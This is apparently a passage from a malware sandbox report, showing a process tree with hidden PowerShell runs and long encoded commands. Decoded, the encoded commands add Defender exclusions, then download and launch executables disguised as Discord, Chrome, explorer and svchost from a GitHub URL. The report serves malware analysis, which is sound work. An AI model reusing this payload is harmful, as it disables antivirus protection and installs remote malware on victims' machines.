kAQQBFAEUAQQBRAGcAQgA2AEEARQBFAEEAUwBBAEIAWgBBAEUARQBBAFcAUQBCADMAQQBFAEkAQQBiAHcAQgBCAEEARQBjAEEATwBBAEIAQgBBAEcATQBBAGQAdwBCAEMAQQBEAEEAQQBRAFEAQgBEAEEARABRAEEAUQBRAEIAYQBBAEYARQBBAFEAZwBBADAAQQBFAEUAQQBSAHcAQgBWAEEARQBFAEEAUwBnAEIAMwBBAEUARQBBAFMAdwBCAEIAQQBFAE0AQQBhAHcAQgBCAEEARQBNAEEAWgB3AEIAQgBBAEUAcwBBAFEAUQBCAEYAQQBHAHMAQQBRAFEAQgBpAEEARwBjAEEAUQBnAEEAeQBBAEUARQBBAFIAdwBBADQAQQBFAEUAQQBZAFEAQgAzAEEARQBJAEEAYgBBAEIAQgBBAEUATQBBAE0AQQBCAEIAQQBGAFkAQQBkAHcAQgBDAEEARwB3AEEAUQBRAEIASABBAEUAawBBAFEAUQBCAFYAQQBHAGMAQQBRAGcAQgBzAEEARQBFAEEAUwBBAEIARgBBAEUARQBBAFoAQQBCAFIAQQBFAEkAQQBiAEEAQgBCAEEARQBnAEEAVABRAEIAQgBBAEcAUQBBAFEAUQBCAEIAQQBHAGMAQQBRAFEAQgBEAEEARABBAEEAUQBRAEIAVwBBAEYARQBBAFEAZwBCADUAQQBFAEUAQQBSAHcAQgByAEEARQBFAEEAUwBRAEIAQgBBAEUARQBBAGEAdwBCAEIAQQBFAGcAQQBWAFEAQgBCAEEARwBNAEEAWgB3AEIAQwBBAEgATQBBAFEAUQBCAEUAQQBFAFUAQQBRAFEAQgBKAEEARQBFAEEAUQBRAEIAMABBAEUARQBBAFIAUQBBADQAQQBFAEUAQQBaAEEAQgBSAEEARQBJAEEATQBBAEIAQgBBAEUAVQBBAFcAUQBCAEIAQQBHAEUAQQBVAFEAQgBDAEEASABNAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgByAEEARQBFAEEAUgB3AEIAMwBBAEUARQBBAFkAZwBCADMAQQBFAEkAQQBhAGcAQgBCAEEARQBjAEEAUgBRAEIAQgBBAEcAUQBBAFEAUQBCAEMAQQBIAEEAQQBRAFEAQgBIAEEARABnAEEAUQBRAEIAaQBBAEcAYwBBAFEAZwBCADYAQQBFAEUAQQBSAGcAQgB6AEEARQBFAEEAVABRAEIAQgBBAEUASQBBAFoAQQBCAEIAQQBFAEUAQQBiAHcAQgBCAEEARgBNAEEAVQBRAEIAQwBBAEgAVQBBAFEAUQBCAEkAQQBGAGsAQQBRAFEAQgBpAEEASABjAEEAUQBnAEIAeQBBAEUARQBBAFIAdwBCAFYAQQBFAEUAQQBUAEEAQgBSAEEARQBJAEEAVwBBAEIAQgBBAEUAYwBBAFYAUQBCAEIAQQBGAGsAQQBaAHcAQgBDAEEARgBNAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAGoAQQBGAEUAQQBRAGcAQQB4AEEARQBFAEEAUgB3AEIAVgBBAEUARQBBAFkAdwBCADMAQQBFAEkAQQBNAEEAQgBCAEEARQBNAEEAUQBRAEIAQgBBAEUAdwBBAFUAUQBCAEMAQQBGAFkAQQBRAFEAQgBJAEEARQBrAEEAUQBRAEIAaABBAEYARQBBAFEAUQBCAG4AQQBFAEUAQQBRAHcAQgBSAEEARQBFAEEAWgBBAEIAUgBBAEUASQBBAGUAUQBCAEIAQQBFAGMAQQBkAHcAQgBCAEEARQAwAEEAWgB3AEIAQgBBAEcAYwBBAFEAUQBCAEQAQQBEAEEAQQBRAFEAQgBVAEEASABjAEEAUQBnAEEAeABBAEUARQBBAFMAQQBCAFIAQQBFAEUAQQBVAGcAQgBuAEEARQBJAEEAYwBBAEIAQgBBAEUAYwBBAGQAdwBCAEIAQQBGAG8AQQBVAFEAQgBCAEEARwBjAEEAUQBRAEIARABBAEYARQBBAFEAUQBCAGkAQQBFAEUAQQBRAGcAQgAyAEEARQBFAEEAUgB3AEIATgBBAEUARQBBAFcAUQBCAFIAQQBFAEkAQQBNAEEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEcASQBBAGQAdwBCAEMAQQBIAFUAQQBRAFEAQgBJAEEARQAwAEEAUQBRAEIAWABBAEgAYwBBAFEAUQBCADQAQQBFAEUAQQBSAGcAQQB3AEEARQBFAEEAUQB3AEIAbgBBAEUASQBBAFMAZwBCAEIAQQBFAGMAQQBOAEEAQgBCAEEARwBRAEEAWgB3AEIAQwBBAEgAWQBBAFEAUQBCAEgAQQBIAE0AQQBRAFEAQgBhAEEARgBFAEEAUQBRAEIAMABBAEUARQBBAFIAZwBCAGoAQQBFAEUAQQBXAGcAQgBSAEEARQBJAEEAYQBRAEIAQgBBAEUAWQBBAFMAUQBCAEIAQQBGAG8AQQBVAFEAQgBDAEEASABnAEEAUQBRAEIASQBBAEYAVQBBAFEAUQBCAGEAQQBGAEUAQQBRAGcAQgA2AEEARQBFAEEAUwBBAEIAUgBBAEUARQBBAFMAUQBCAEIAQQBFAEUAQQBkAEEAQgBCAEEARQBZAEEAVgBRAEIAQgBBAEcATQBBAFoAdwBCAEMAQQBIAEEAQQBRAFEAQgBEAEEARQBFAEEAUQBRAEIASwBBAEUARQBBAFEAZwBBAHgAQQBFAEUAQQBTAEEAQgBKAEEARQBFAEEAWQBnAEIAQgBBAEUARQBBAGUAZwBCAEIAQQBFAE0AQQBRAFEAQgBCAEEARQB3AEEAVQBRAEIAQwBBAEYAQQBBAFEAUQBCAEkAQQBGAFUAQQBRAFEAQgBrAEEARQBFAEEAUQBnAEIASABBAEUARQBBAFIAdwBCAHIAQQBFAEUAQQBZAGcAQgBCAEEARQBJAEEAYgBBAEIAQgBBAEUATQBBAFEAUQBCAEIAQQBFAG8AQQBRAFEAQgBDAEEASABNAEEAUQBRAEIASABBAEQAZwBBAFEAUQBCAFoAQQBIAGMAQQBRAGcAQgBvAEEARQBFAEEAUwBBAEIAUgBBAEUARQBBAFkAUQBCAFIAQQBFAEkAQQBkAGcAQgBCAEEARQBjAEEATgBBAEIAQgBBAEcATQBBAGQAdwBCAEMAQQBHAEkAQQBRAFEAQgBFAEEARQBrAEEAUQBRAEIAWQBBAEYARQBBAFEAUQBCAEwAQQBFAEUAQQBSAFEAQgByAEEARQBFAEEAWQBnAEIAbgBBAEUASQBBAE0AZwBCAEIAQQBFAGMAQQBPAEEAQgBCAEEARwBFAEEAZAB3AEIAQwBBAEcAdwBBAFEAUQBCAEQAQQBEAEEAQQBRAFEAQgBXAEEASABjAEEAUQBnAEIAcwBBAEUARQBBAFIAdwBCAEoAQQBFAEUAQQBWAFEAQgBuAEEARQBJAEEAYgBBAEIAQgBBAEUAZwBBAFIAUQBCAEIAQQBHAFEAQQBVAFEAQgBDAEEARwB3AEEAUQBRAEIASQBBAEUAMABBAFEAUQBCAGsAQQBFAEUAQQBRAFEAQgBuAEEARQBFAEEAUQB3AEEAdwBBAEUARQBBAFYAZwBCAFIAQQBFAEkAQQBlAFEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEUAawBBAFEAUQBCAEIAQQBHAHMAQQBRAFEAQgBJAEEARgBVAEEAUQBRAEIAagBBAEcAYwBBAFEAZwBCAHoAQQBFAEUAQQBSAEEAQgBSAEEARQBFAEEAUwBRAEIAQgBBAEUARQBBAGQAQQBCAEIAQQBFAFUAQQBPAEEAQgBCAEEARwBRAEEAVQBRAEIAQwBBAEQAQQBBAFEAUQBCAEYAQQBGAGsAQQBRAFEAQgBoAEEARgBFAEEAUQBnAEIAegBBAEUARQBBAFIAdwBCAFYAQQBFAEUAQQBTAFEAQgBCAEEARQBFAEEAYQB3AEIAQgBBAEUAYwBBAGQAdwBCAEIAQQBHAEkAQQBkAHcAQgBDAEEARwBvAEEAUQBRAEIASABBAEUAVQBBAFEAUQBCAGsAQQBFAEUAQQBRAGcAQgB3AEEARQBFAEEAUgB3AEEANABBAEUARQBBAFkAZwBCAG4AQQBFAEkAQQBlAGcAQgBCAEEARQBZAEEAYwB3AEIAQgBBAEUAMABBAGQAdwBCAEMAQQBHAFEAQQBRAFEAQgBCAEEARwA4AEEAUQBRAEIARABBAEcAYwBBAFEAZwBCAHQAQQBFAEUAQQBSAHcAQQA0AEEARQBFAEEAWQB3AEIAbgBBAEUASQBBAGIAQQBCAEIAQQBFAGMAQQBSAFEAQgBCAEEARgBrAEEAZAB3AEIAQwBBAEcAOABBAFEAUQBCAEQAQQBFAEUAQQBRAFEAQgBMAEEARQBFAEEAUQBRAEIAcgBBAEUARQBBAFIAdwBCADMAQQBFAEUAQQBZAGcAQgAzAEEARQBJAEEAYQBnAEIAQgBBAEUAYwBBAFIAUQBCAEIAQQBHAFEAQQBRAFEAQgBDAEEASABBAEEAUQBRAEIASABBAEQAZwBBAFEAUQBCAGkAQQBHAGMAQQBRAFEAQgBuAEEARQBFAEEAUgB3AEIAcgBBAEUARQBBAFkAZwBCAG4AQQBFAEUAQQBaAHcAQgBCAEEARQBNAEEAVQBRAEIAQgBBAEcASQBBAFEAUQBCAEMAQQBIAFkAQQBRAFEAQgBIAEEARQAwAEEAUQBRAEIAWgBBAEYARQBBAFEAZwBBAHcAQQBFAEUAQQBSAHcAQgByAEEARQBFAEEAWQBnAEIAMwBBAEUASQBBAGQAUQBCAEIAQQBFAGcAQQBUAFEAQgBCAEEARQBzAEEAVQBRAEIAQgBBAEcAYwBBAFEAUQBCAEkAQQBIAE0AQQBRAFEAQgBEAEEARwBjAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBCAEIAQQBFAEUAQQBTAFEAQgBCAEEARQBFAEEAWgB3AEIAQgBBAEUAWQBBAFQAUQBCAEIAQQBHAFEAQQBRAFEAQgBDAEEARwBnAEEAUQBRAEIASQBBAEUAawBBAFEAUQBCAGsAQQBFAEUAQQBRAFEAQgAwAEEARQBFAEEAUgBnAEIAQgBBAEUARQBBAFkAdwBCAG4AQQBFAEkAQQBkAGcAQgBCAEEARQBjAEEAVABRAEIAQgBBAEYAbwBBAFUAUQBCAEMAQQBIAG8AQQBRAFEAQgBJAEEARQAwAEEAUQBRAEIASgBBAEUARQBBAFEAUQBCADAAQQBFAEUAQQBSAFEAQgBaAEEARQBFAEEAWQBRAEIAUgBBAEUASQBBAGMAdwBCAEIAQQBFAGMAQQBWAFEAQgBCAEEARgBVAEEAUQBRAEIAQwBBAEcAZwBBAFEAUQBCAEkAQQBGAEUAQQBRAFEAQgBoAEEARQBFAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBCAFIAQQBFAEUAQQBZAGcAQgBCAEEARQBJAEEAZABnAEIAQgBBAEUAYwBBAFQAUQBCAEIAQQBGAGsAQQBVAFEAQgBDAEEARABBAEEAUQBRAEIASABBAEcAcwBBAFEAUQBCAGkAQQBIAGMAQQBRAGcAQgAxAEEARQBFAEEAUQB3AEIAQgBBAEUARQBBAFQAQQBCAFIAQQBFAEkAQQBXAEEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEcASQBBAFoAdwBCAEMAQQBHAHMAQQBRAFEAQgBIAEEARABnAEEAUQBRAEIAawBBAEgAYwBBAFEAZwBCAFUAQQBFAEUAQQBTAEEAQgBSAEEARQBFAEEAWgBRAEIAUgBBAEUASQBBAGMAdwBCAEIAQQBFAGMAQQBWAFEAQgBCAEEARQBrAEEAUQBRAEIAQwBBAEUAawBBAFEAUQBCAEgAQQBHAHMAQQBRAFEAQgBhAEEARQBFAEEAUQBnAEIAcgBBAEUARQBBAFIAdwBCAFYAQQBFAEUAQQBZAGcAQgBuAEEARQBFAEEAWgB3AEIAQgBBAEUATQBBAE0AQQBCAEIAQQBGAFkAQQBkAHcAQgBDAEEARwBnAEEAUQBRAEIASABBAEcAcwBBAFEAUQBCAGsAQQBFAEUAQQBRAFEAQgBMAEEARQBFAEEAUwBBAEEAdwBBAEUARQBBAEkAZwBBAD0AIgAKAA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAGMAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEASABNAEEAYQBBAEIAbABBAEcAdwBBAGIAQQBBAGcAQQBDADAAQQBWAHcAQgBwAEEARwA0AEEAWgBBAEIAdgBBAEgAYwBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgBsAEEAQwBBAEEAUwBBAEIAcABBAEcAUQBBAFoAQQBCAGwAQQBHADQAQQBJAEEAQQB0AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFkAUQBCAHUAQQBHAFEAQQBJAEEAQQBpAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFQAUQBCAHcAQQBGAEEAQQBjAGcAQgBsAEEARwBZAEEAWgBRAEIAeQBBAEcAVQBBAGIAZwBCAGoAQQBHAFUAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAagBBAEcAdwBBAGQAUQBCAHoAQQBHAGsAQQBiAHcAQgB1AEEARgBBAEEAWQBRAEIAMABBAEcAZwBBAEkAQQBBAG4AQQBFAE0AQQBPAGcAQgBjAEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEEAbgBBAEMASQBBAEMAZwBCAHcAQQBHADgAQQBkAHcAQgBsAEEASABJAEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBDAEEAQQBMAFEAQgBYAEEARwBrAEEAYgBnAEIAawBBAEcAOABBAGQAdwBCAFQAQQBIAFEAQQBlAFEAQgBzAEEARwBVAEEASQBBAEIASQBBAEcAawBBAFoAQQBCAGsAQQBHAFUAQQBiAGcAQQBnAEEAQwAwAEEAUQB3AEIAdgBBAEcAMABBAGIAUQBCAGgAQQBHADQAQQBaAEEAQQBnAEEAQwBJAEEAUQBRAEIAawBBAEcAUQBBAEwAUQBCAE4AQQBIAEEAQQBVAEEAQgB5AEEARwBVAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQQBnAEEAQwAwAEEAUgBRAEIANABBAEcATQBBAGIAQQBCADEAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVgBRAEIAegBBAEcAVQBBAGMAZwBCAHoAQQBGAHcAQQBVAEEAQgAxAEEARwBJAEEAYgBBAEIAcABBAEcATQBBAFgAQQBCAEUAQQBHADgAQQBkAHcAQgB1AEEARwB3AEEAYgB3AEIAaABBAEcAUQBBAGMAdwBBAG4AQQBDAEkAQQBDAGcAQgB3AEEARwA4AEEAZAB3AEIAbABBAEgASQBBAGMAdwBCAG8AQQBHAFUAQQBiAEEAQgBzAEEAQwBBAEEATABRAEIAWABBAEcAawBBAGIAZwBCAGsAQQBHADgAQQBkAHcAQgBUAEEASABRAEEAZQBRAEIAcwBBAEcAVQBBAEkAQQBCAEkAQQBHAGsAQQBaAEEAQgBrAEEARwBVAEEAYgBnAEEAZwBBAEMAMABBAFEAdwBCAHYAQQBHADAAQQBiAFEAQgBoAEEARwA0AEEAWgBBAEEAZwBBAEMASQBBAFEAUQBCAGsAQQBHAFEAQQBMAFEAQgBOAEEASABBAEEAVQBBAEIAeQBBAEcAVQBBAFoAZwBCAGwAQQBIAEkAQQBaAFEAQgB1AEEARwBNAEEAWgBRAEEAZwBBAEMAMABBAFIAUQBCADQAQQBHAE0AQQBiAEEAQgAxAEEASABNAEEAYQBRAEIAdgBBAEcANABBAFUAQQBCAGgAQQBIAFEAQQBhAEEAQQBnAEEAQwBjAEEAUQB3AEEANgBBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEARABNAEEATQBnAEEAbgBBAEMASQBBAEMAZwBCAHcAQQBHADgAQQBkAHcAQgBsAEEASABJAEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBDAEEAQQBMAFEAQgBYAEEARwBrAEEAYgBnAEIAawBBAEcAOABBAGQAdwBCAFQAQQBIAFEAQQBlAFEAQgBzAEEARwBVAEEASQBBAEIASQBBAEcAawBBAFoAQQBCAGsAQQBHAFUAQQBiAGcAQQBnAEEAQwAwAEEAUQB3AEIAdgBBAEcAMABBAGIAUQBCAGgAQQBHADQAQQBaAEEAQQBnAEEAQwBJAEEAUQBRAEIAawBBAEcAUQBBAEwAUQBCAE4AQQBIAEEAQQBVAEEAQgB5AEEARwBVAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQQBnAEEAQwAwAEEAUgBRAEIANABBAEcATQBBAGIAQQBCADEAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVgB3AEIAcABBAEcANABBAFoAQQBCAHYAQQBIAGMAQQBjAHcAQgBjAEEARgBNAEEAZQBRAEIAegBBAEYAYwBBAFQAdwBCAFgAQQBEAFkAQQBOAEEAQQBuAEEAQwBJAEEAQwBnAEIAdwBBAEcAOABBAGQAdwBCAGwAQQBIAEkAQQBjAHcAQgBvAEEARwBVAEEAYgBBAEIAcwBBAEMAQQBBAEwAUQBCAFgAQQBHAGsAQQBiAGcAQgBrAEEARwA4AEEAZAB3AEIAVABBAEgAUQBBAGUAUQBCAHMAQQBHAFUAQQBJAEEAQgBJAEEARwBrAEEAWgBBAEIAawBBAEcAVQBBAGIAZwBBAGcAQQBDADAAQQBRAHcAQgB2AEEARwAwAEEAYgBRAEIAaABBAEcANABBAFoAQQBBAGcAQQBDAEkAQQBRAFEAQgBrAEEARwBRAEEATABRAEIATgBBAEgAQQBBAFUAQQBCAHkAQQBHAFUAQQBaAGcAQgBsAEEASABJAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBBAGcAQQBDADAAQQBSAFEAQgA0AEEARwBNAEEAYgBBAEIAMQBBAEgATQBBAGEAUQBCAHYAQQBHADQAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMAYwBBAFEAdwBBADYAQQBGAHcAQQBWAHcAQgBwAEEARwA0AEEAWgBBAEIAdgBBAEgAYwBBAGMAdwBBAG4AQQBDAEkAQQBDAGcAQQBLAEEAQwBRAEEAZABRAEIAeQBBAEcAdwBBAE0AUQBBAGcAQQBEADAAQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBrAEEAZABBAEIAbwBBAEgAVQBBAFkAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQwA4AEEAUQBRAEIAdABBAEcAbwBBAFkAUQBCAGsAQQBFAEkAQQBZAFEAQgBzAEEARwB3AEEAYwB3AEEAdgBBAEYAUQBBAFIAUQBCAFQAQQBGAFEAQQBMAHcAQgB5AEEARwBFAEEAZAB3AEEAdgBBAEgASQBBAFoAUQBCAG0AQQBIAE0AQQBMAHcAQgBvAEEARwBVAEEAWQBRAEIAawBBAEgATQBBAEwAdwBCAHQAQQBHAEUAQQBhAFEAQgB1AEEAQwA4AEEAUgBBAEIAcABBAEgATQBBAFkAdwBCAHYAQQBIAEkAQQBaAEEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEMAZwBBAGsAQQBIAFUAQQBjAGcAQgBzAEEARABJAEEASQBBAEEAOQBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEASABNAEEATwBnAEEAdgBBAEMAOABBAFoAdwBCAHAAQQBIAFEAQQBhAEEAQgAxAEEARwBJAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHYAQQBFAEUAQQBiAFEAQgBxAEEARwBFAEEAWgBBAEIAQwBBAEcARQBBAGIAQQBCAHMAQQBIAE0AQQBMAHcAQgBVAEEARQBVAEEAVQB3AEIAVQBBAEMAOABBAGMAZwBCAGgAQQBIAGMAQQBMAHcAQgB5AEEARwBVAEEAWgBnAEIAegBBAEMAOABBAGEAQQBCAGwAQQBHAEUAQQBaAEEAQgB6AEEAQwA4AEEAYgBRAEIAaABBAEcAawBBAGIAZwBBAHYAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEUATQBBAGEAQQBCAHkAQQBHADgAQQBiAFEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAEsAQQBDAFEAQQBkAFEAQgB5AEEARwB3AEEATQB3AEEAZwBBAEQAMABBAEkAQQBBAG4AQQBHAGcAQQBkAEEAQgAwAEEASABBAEEAYwB3AEEANgBBAEMAOABBAEwAdwBCAG4AQQBHAGsAQQBkAEEAQgBvAEEASABVAEEAWQBnAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBRAFEAQgB0AEEARwBvAEEAWQBRAEIAawBBAEUASQBBAFkAUQBCAHMAQQBHAHcAQQBjAHcAQQB2AEEARgBRAEEAUgBRAEIAVABBAEYAUQBBAEwAdwBCAHkAQQBHAEUAQQBkAHcAQQB2AEEASABJAEEAWgBRAEIAbQBBAEgATQBBAEwAdwBCAG8AQQBHAFUAQQBZAFEAQgBrAEEASABNAEEATAB3AEIAdABBAEcARQBBAGEAUQBCAHUAQQBDADgAQQBaAFEAQgA0AEEASABBAEEAYgBBAEIAdgBBAEgASQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEASwBBAEMAUQBBAGQAUQBCAHkAQQBHAHcAQQBOAEEAQQBnAEEARAAwAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBjAHcAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcAawBBAGQAQQBCAG8AQQBIAFUAQQBZAGcAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAFEAUQBCAHQAQQBHAG8AQQBZAFEAQgBrAEEARQBJAEEAWQBRAEIAcwBBAEcAdwBBAGMAdwBBAHYAQQBGAFEAQQBSAFEAQgBUAEEARgBRAEEATAB3AEIAeQBBAEcARQBBAGQAdwBBAHYAQQBIAEkAQQBaAFEAQgBtAEEASABNAEEATAB3AEIAbwBBAEcAVQBBAFkAUQBCAGsAQQBIAE0AQQBMAHcAQgB0AEEARwBFAEEAYQBRAEIAdQBBAEMAOABBAGMAdwBCADIAQQBHAE0AQQBhAEEAQgB2AEEASABNAEEAZABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBDAGcAQQBLAEEAQwBRAEEAYgBBAEIAdgBBAEcATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEASABNAEEASQBBAEEAOQBBAEMAQQBBAFEAQQBBAG8AQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAFUAQQBjAHcAQgBsAEEASABJAEEAYwB3AEIAYwBBAEYAQQBBAGQAUQBCAGkAQQBHAHcAQQBhAFEAQgBqAEEARgB3AEEAUgBBAEIAdgBBAEgAYwBBAGIAZwBCAHMAQQBHADgAQQBZAFEAQgBrAEEASABNAEEAWABBAEIARQBBAEcAawBBAGMAdwBCAGoAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAHMAQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAFUAQQBjAHcAQgBsAEEASABJAEEAYwB3AEIAYwBBAEYAQQBBAGQAUQBCAGkAQQBHAHcAQQBhAFEAQgBqAEEARgB3AEEAUgBBAEIAdgBBAEgAYwBBAGIAZwBCAHMAQQBHADgAQQBZAFEAQgBrAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBEAEEARwBnAEEAYwBnAEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATABBAEEASwBBAEMAQQBBAEkAQQBBAGcAQQBDAEEAQQBKAHcAQgBEAEEARABvAEEAWABBAEIAVgBBAEgATQBBAFoAUQBCAHkAQQBIAE0AQQBYAEEAQgBRAEEASABVAEEAWQBnAEIAcwBBAEcAawBBAFkAdwBCAGMAQQBFAFEAQQBiAHcAQgAzAEEARwA0AEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAHoAQQBGAHcAQQBaAFEAQgA0AEEASABBAEEAYgBBAEIAdgBBAEgASQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAcwBBAEEAbwBBAEkAQQBBAGcAQQBDAEEAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAVQBBAGMAdwBCAGwAQQBIAEkAQQBjAHcAQgBjAEEARgBBAEEAZABRAEIAaQBBAEcAdwBBAGEAUQBCAGoAQQBGAHcAQQBSAEEAQgB2AEEASABjAEEAYgBnAEIAcwBBAEcAOABBAFkAUQBCAGsAQQBIAE0AQQBYAEEAQgB6AEEASABZAEEAWQB3AEIAbwBBAEcAOABBAGMAdwBCADAAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEASwBBAEMAawBBAEMAZwBBAEsAQQBFAGsAQQBiAGcAQgAyAEEARwA4AEEAYQB3AEIAbABBAEMAMABBAFYAdwBCAGwAQQBHAEkAQQBVAGcAQgBsAEEASABFAEEAZABRAEIAbABBAEgATQBBAGQAQQBBAGcAQQBDADAAQQBWAFEAQgB5AEEARwBrAEEASQBBAEEAawBBAEgAVQBBAGMAZwBCAHMAQQBEAEUAQQBJAEEAQQB0AEEARQA4AEEAZABRAEIAMABBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBJAEEAQQBrAEEARwB3AEEAYgB3AEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgBzAEEATQBBAEIAZABBAEEAbwBBAFMAUQBCAHUAQQBIAFkAQQBiAHcAQgByAEEARwBVAEEATABRAEIAWABBAEcAVQBBAFkAZwBCAFMAQQBHAFUAQQBjAFEAQgAxAEEARwBVAEEAYwB3AEIAMABBAEMAQQBBAEwAUQBCAFYAQQBIAEkAQQBhAFEAQQBnAEEAQwBRAEEAZABRAEIAeQBBAEcAdwBBAE0AZwBBAGcAQQBDADAAQQBUAHcAQgAxAEEASABRAEEAUgBnAEIAcABBAEcAdwBBAFoAUQBBAGcAQQBDAFEAQQBiAEEAQgB2AEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBIAE0AQQBXAHcAQQB4AEEARgAwAEEAQwBnAEIASgBBAEcANABBAGQAZwBCAHYAQQBHAHMAQQBaAFEAQQB0AEEARgBjAEEAWgBRAEIAaQBBAEYASQBBAFoAUQBCAHgAQQBIAFUAQQBaAFEAQgB6AEEASABRAEEASQBBAEEAdABBAEYAVQBBAGMAZwBCAHAAQQBDAEEAQQBKAEEAQgAxAEEASABJAEEAYgBBAEEAegBBAEMAQQBBAEwAUQBCAFAAQQBIAFUAQQBkAEEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEMAQQBBAEoAQQBCAHMAQQBHADgAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAGIAQQBEAEkAQQBYAFEAQQBLAEEARQBrAEEAYgBnAEIAMgBBAEcAOABBAGEAdwBCAGwAQQBDADAAQQBWAHcAQgBsAEEARwBJAEEAVQBnAEIAbABBAEgARQBBAGQAUQBCAGwAQQBIAE0AQQBkAEEAQQBnAEEAQwAwAEEAVgBRAEIAeQBBAEcAawBBAEkAQQBBAGsAQQBIAFUAQQBjAGcAQgBzAEEARABRAEEASQBBAEEAdABBAEUAOABBAGQAUQBCADAAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEASQBBAEEAawBBAEcAdwBBAGIAdwBCAGoAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEIAegBBAEYAcwBBAE0AdwBCAGQAQQBBAG8AQQBDAGcAQgBtAEEARwA4AEEAYwBnAEIAbABBAEcARQBBAFkAdwBCAG8AQQBDAEEAQQBLAEEAQQBrAEEARwB3AEEAYgB3AEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBrAEEAYgBnAEEAZwBBAEMAUQBBAGIAQQBCAHYAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEgATQBBAEsAUQBBAGcAQQBIAHMAQQBDAGcAQQBnAEEAQwBBAEEASQBBAEEAZwBBAEYATQBBAGQAQQBCAGgAQQBIAEkAQQBkAEEAQQB0AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHoAQQBIAE0AQQBJAEEAQQB0AEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAFUAQQBCAGgAQQBIAFEAQQBhAEEAQQBnA